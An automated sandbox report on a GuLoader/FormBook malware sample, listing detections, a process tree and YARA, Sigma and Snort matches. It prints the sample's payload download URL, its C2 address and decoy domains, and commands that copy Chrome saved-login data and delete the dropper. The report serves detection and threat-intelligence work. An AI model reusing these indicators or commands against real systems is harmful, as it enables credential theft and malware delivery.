Play interactive tour

Edit tour

Windows Analysis Report Zr26f1rL6r.exe

Overview

General Information

Sample Name:	Zr26f1rL6r.exe
Analysis ID:	528518
MD5:	812181df251e06433bf2f4f6a0c0f0f4
SHA1:	aa38a567ee48483d98966622fd320c791bc45871
SHA256:	4d6c910a379d00f329e55ad98a7817de0370695566443a74a9a02c85d2463a9d
Infos:
Most interesting Screenshot:

Detection

GuLoader FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Generic Dropper

Multi AV Scanner detection for submitted file

Yara detected FormBook

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

GuLoader behavior detected

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Hides threads from debuggers

Sample uses process hollowing technique

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Writes to foreign memory regions

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Performs DNS queries to domains with low reputation

Self deletion via cmd delete

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Sigma detected: Suspicious Rundll32 Without Any CommandLine Params

Tries to resolve many domain names, but no domain seems valid

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Enables debug privileges

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

PE / OLE file has an invalid certificate

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64native

Zr26f1rL6r.exe (PID: 6656 cmdline: "C:\Users\user\Desktop\Zr26f1rL6r.exe" MD5: 812181DF251E06433BF2F4F6A0C0F0F4)

Zr26f1rL6r.exe (PID: 6600 cmdline: "C:\Users\user\Desktop\Zr26f1rL6r.exe" MD5: 812181DF251E06433BF2F4F6A0C0F0F4)

explorer.exe (PID: 4644 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)

rundll32.exe (PID: 4624 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 889B99C52A60DD49227C5E485A016679)

cmd.exe (PID: 5276 cmdline: /c del "C:\Users\user\Desktop\Zr26f1rL6r.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 4808 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

firefox.exe (PID: 5640 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)

c8ahotgz8h.exe (PID: 5500 cmdline: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe MD5: 812181DF251E06433BF2F4F6A0C0F0F4)

c8ahotgz8h.exe (PID: 5908 cmdline: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe MD5: 812181DF251E06433BF2F4F6A0C0F0F4)

c8ahotgz8h.exe (PID: 7504 cmdline: "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe" MD5: 812181DF251E06433BF2F4F6A0C0F0F4)

c8ahotgz8h.exe (PID: 2508 cmdline: "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe" MD5: 812181DF251E06433BF2F4F6A0C0F0F4)

c8ahotgz8h.exe (PID: 6900 cmdline: "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe" MD5: 812181DF251E06433BF2F4F6A0C0F0F4)

c8ahotgz8h.exe (PID: 7388 cmdline: "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe" MD5: 812181DF251E06433BF2F4F6A0C0F0F4)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://atseasonals.com/GHrtt/bin_k"}

Threatname: FormBook

{"C2 list": ["www.ayudavida.com/n8ds/"], "decoy": ["topwowshopping.store", "helpcloud.xyz", "reliablehomesellers.com", "lopsrental.lease", "luxalbridi.com", "recoverytrivia.com", "apps365.one", "shrywl.com", "ozattaos.xyz", "recruitresumelibrary.com", "receiptpor.xyz", "stylesbykee.com", "dczhd.com", "learncodeing.com", "cmoigus.net", "unitedmetal-saudi.com", "koedayuuki.com", "dif-directory.xyz", "heyvecino.com", "mariforum.com", "mackthetruck.com", "quickcoreohio.com", "wordpresshostingblog.com", "peo-campaign.com", "hsbp.online", "divorcefearfreedom.com", "testwebsite0711.com", "khoashop.com", "32342231.xyz", "inklusion.online", "jobl.space", "maroonday.com", "mummymotors.com", "diamota.com", "effective.store", "theyachtmarkets.com", "braxtynmi.xyz", "photon4energy.com", "dubaicars.online", "growebox.com", "abcjanitorialsolutions.com", "aubzo7o9fm.com", "betallsports247.com", "nphone.tech", "diggingquartz.com", "yghdlhax.xyz", "paulalescanorealestate.com", "chaudharyhamza.com", "jamiecongedo.com", "gdav130.xyz", "dietatrintadias.com", "csenmoga.com", "avto-click.com", "goldcoastdoublelot.com", "blueitsolutions.info", "fatima2021.com", "talkingpoint.tours", "smartam6.xyz", "tvterradafarinha.com", "palmasdelmarcondos.com", "3uwz9mpxk77g.biz", "zzytyzf.top", "writingmomsobitwithmom.com", "littlefishth.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000001E.00000000.51287210518.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000019.00000000.50661482100.0000000040097000.00000004.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x37f8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000A.00000000.47309959760.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000019.00000002.50719644805.0000000040097000.00000004.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x37f8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x38e4:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001C.00000000.51076893477.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000019.00000000.50714091090.0000000040097000.00000004.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x37f8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.51929622698.0000000004887000.00000004.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x37f8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001D.00000000.51204349057.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6ad9:$sqlite3step: 68 34 1C 7B E1 0x6bec:$sqlite3step: 68 34 1C 7B E1 0x6b08:$sqlite3text: 68 38 2A 90 C5 0x6c2d:$sqlite3text: 68 38 2A 90 C5 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000001E.00000002.51740663183.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Zr26f1rL6r.exe PID: 6600	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: rundll32.exe PID: 4624	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: c8ahotgz8h.exe PID: 5908	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: c8ahotgz8h.exe PID: 2508	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: c8ahotgz8h.exe PID: 7388	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Click to see the 37 entries

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Show sources

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4644, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 4624

Sigma detected: Suspicious Rundll32 Without Any CommandLine Params

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4644, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 4624

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000001E.00000000.51287210518.0000000000560000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://atseasonals.com/GHrtt/bin_k"}
Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp	Malware Configuration Extractor: FormBook {"C2 list": ["www.ayudavida.com/n8ds/"], "decoy": ["topwowshopping.store", "helpcloud.xyz", "reliablehomesellers.com", "lopsrental.lease", "luxalbridi.com", "recoverytrivia.com", "apps365.one", "shrywl.com", "ozattaos.xyz", "recruitresumelibrary.com", "receiptpor.xyz", "stylesbykee.com", "dczhd.com", "learncodeing.com", "cmoigus.net", "unitedmetal-saudi.com", "koedayuuki.com", "dif-directory.xyz", "heyvecino.com", "mariforum.com", "mackthetruck.com", "quickcoreohio.com", "wordpresshostingblog.com", "peo-campaign.com", "hsbp.online", "divorcefearfreedom.com", "testwebsite0711.com", "khoashop.com", "32342231.xyz", "inklusion.online", "jobl.space", "maroonday.com", "mummymotors.com", "diamota.com", "effective.store", "theyachtmarkets.com", "braxtynmi.xyz", "photon4energy.com", "dubaicars.online", "growebox.com", "abcjanitorialsolutions.com", "aubzo7o9fm.com", "betallsports247.com", "nphone.tech", "diggingquartz.com", "yghdlhax.xyz", "paulalescanorealestate.com", "chaudharyhamza.com", "jamiecongedo.com", "gdav130.xyz", "dietatrintadias.com", "csenmoga.com", "avto-click.com", "goldcoastdoublelot.com", "blueitsolutions.info", "fatima2021.com", "talkingpoint.tours", "smartam6.xyz", "tvterradafarinha.com", "palmasdelmarcondos.com", "3uwz9mpxk77g.biz", "zzytyzf.top", "writingmomsobitwithmom.com", "littlefishth.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Zr26f1rL6r.exe	Virustotal: Detection: 40%			Perma Link
Source: Zr26f1rL6r.exe	ReversingLabs: Detection: 20%

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Show sources

Source: http://www.jamiecongedo.com/n8ds/?6ldD=BkWPMdYTTR0ZQmtbwmm8ayu+d1W65DpSRIKYH6pwPIESNdIBtEF9Jb3WD/+idhQ1krue&2dfPiT=o6P8yX

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Grt4lhl\c8ahotgz8h.exe

ReversingLabs: Detection: 20%

Source: 15.2.rundll32.exe.488796c.4.unpack	Avira: Label: TR/Dropper.Gen
Source: 15.2.rundll32.exe.540a58.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 25.0.firefox.exe.4009796c.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 25.0.firefox.exe.4009796c.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 25.2.firefox.exe.4009796c.0.unpack	Avira: Label: TR/Dropper.Gen

Source: Zr26f1rL6r.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49841 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: Zr26f1rL6r.exe, 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51750821024.000000001E890000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51752294745.000000001E9BD000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: c8ahotgz8h.exe, c8ahotgz8h.exe, 0000001E.00000002.51750821024.000000001E890000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51752294745.000000001E9BD000.00000040.00000001.sdmp
Source:	Binary string: rundll32.pdb source: Zr26f1rL6r.exe, 0000000A.00000002.47938438528.00000000000D0000.00000040.00020000.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47933760701.00000000008E5000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdbGCTL source: Zr26f1rL6r.exe, 0000000A.00000002.47938438528.00000000000D0000.00000040.00020000.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47933760701.00000000008E5000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0040FA90 FindFirstFileW,FindNextFileW,FindClose,		15_2_0040FA90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0040FA89 FindFirstFileW,FindNextFileW,FindClose,		15_2_0040FA89

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 104.21.76.223:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 104.21.76.223:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 104.21.76.223:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49817 -> 164.155.212.139:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49817 -> 164.155.212.139:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49817 -> 164.155.212.139:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 172.120.157.187:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 172.120.157.187:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49818 -> 172.120.157.187:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49819 -> 3.64.163.50:80
